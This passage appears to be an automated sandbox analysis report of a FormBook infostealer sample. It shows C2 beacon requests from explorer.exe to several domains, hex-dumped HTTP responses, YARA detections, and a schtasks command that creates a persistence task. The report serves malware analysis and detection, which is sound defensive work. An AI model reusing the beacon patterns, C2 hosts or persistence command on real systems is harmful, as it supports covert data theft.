34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            11192.168.2.349769173.234.175.13480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:06:02.573239088 CET10013OUTGET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1
                                                                            Host: www.travelnetafrica.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:02.767956018 CET10015INHTTP/1.1 500 Internal Server Error
                                                                            Cache-Control: private
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Server: Microsoft-IIS/8.5
                                                                            X-AspNet-Version: 4.0.30319
                                                                            X-Powered-By: ASP.NET
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Headers: *
                                                                            Access-Control-Allow-Methods: GET, POST
                                                                            Date: Wed, 13 Jan 2021 20:06:01 GMT
                                                                            Connection: close
                                                                            Content-Length: 4298
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            12192.168.2.34977145.77.226.20980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:06:18.190871000 CET10020OUTGET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1
                                                                            Host: www.fessusesefsee.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:18.245893002 CET10021INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 13 Jan 2021 20:17:53 GMT
                                                                            Server: X-SinkHole: Malware DNS SinkHole Server
                                                                            Content-Length: 307
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            13192.168.2.349772142.44.212.16980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:06:23.388031960 CET10021OUTGET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1
                                                                            Host: www.queensboutique1000.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:06:24.072344065 CET10023INHTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 13 Jan 2021 20:06:23 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=03992809e1dafa22878fd09f51a014ee%7C%7C1610741183%7C%7C1610737583%7C%7C40941839f9c3c2b52346de3c823ded95; expires=Fri, 15-Jan-2021 20:06:23 GMT; Max-Age=172800; path=/; HttpOnly
                                                                            Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.349756142.44.212.16980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:04:54.974946022 CET9649OUTGET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1
                                                                            Host: www.queensboutique1000.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:04:55.720679045 CET9649INHTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 13 Jan 2021 20:04:55 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Set-Cookie: wp_woocommerce_session_f594b69e16a4b5047a231fa253aa1f27=b7bae79cc80ddaa5594beaf6bd33068b%7C%7C1610741095%7C%7C1610737495%7C%7Cc55af832d2d4108ede2bccf91945ac5e; expires=Fri, 15-Jan-2021 20:04:55 GMT; Max-Age=172800; path=/; HttpOnly
                                                                            Location: http://queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=UTF-8


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.34975834.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:00.634299994 CET9662OUTGET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1
                                                                            Host: www.studentdividers.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:00.772897959 CET9665INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 13 Jan 2021 20:05:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "5ffc83a2-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.349759192.0.78.20880C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:05.893126011 CET9679OUTGET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1
                                                                            Host: www.logansshop.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:05.933063984 CET9679INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT
                                                                            X-ac: 2.hhn
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.34976034.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:11.046991110 CET9682OUTGET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1
                                                                            Host: www.epicmassiveconcepts.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:11.186150074 CET9682INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 13 Jan 2021 20:05:11 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "5ffc8399-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.349761192.155.166.18180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:22.236080885 CET9684OUTGET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1
                                                                            Host: www.exit-divorce.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:22.461457014 CET9684INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:22 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1.0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.349765205.134.254.18980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:27.905106068 CET9818OUTGET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1
                                                                            Host: www.splendidhotelspa.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:28.102826118 CET9819INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.19.3
                                                                            Date: Wed, 13 Jan 2021 20:05:28 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Content-Length: 236
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.349766146.148.193.21280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:38.638372898 CET9992OUTGET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1
                                                                            Host: www.stnanguo.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:38.823584080 CET9993INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 13 Jan 2021 20:05:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.34976723.105.124.22580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:44.419821978 CET9994OUTGET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1
                                                                            Host: www.alparmuhendislik.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:21:03:35
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\J0OmHIagw8.exe'
                                                                            Imagebase:0xe50000
                                                                            File size:582656 bytes
                                                                            MD5 hash:92FF500A693078263908C83B4B290481
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:21:03:39
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
                                                                            Imagebase:0xe0000
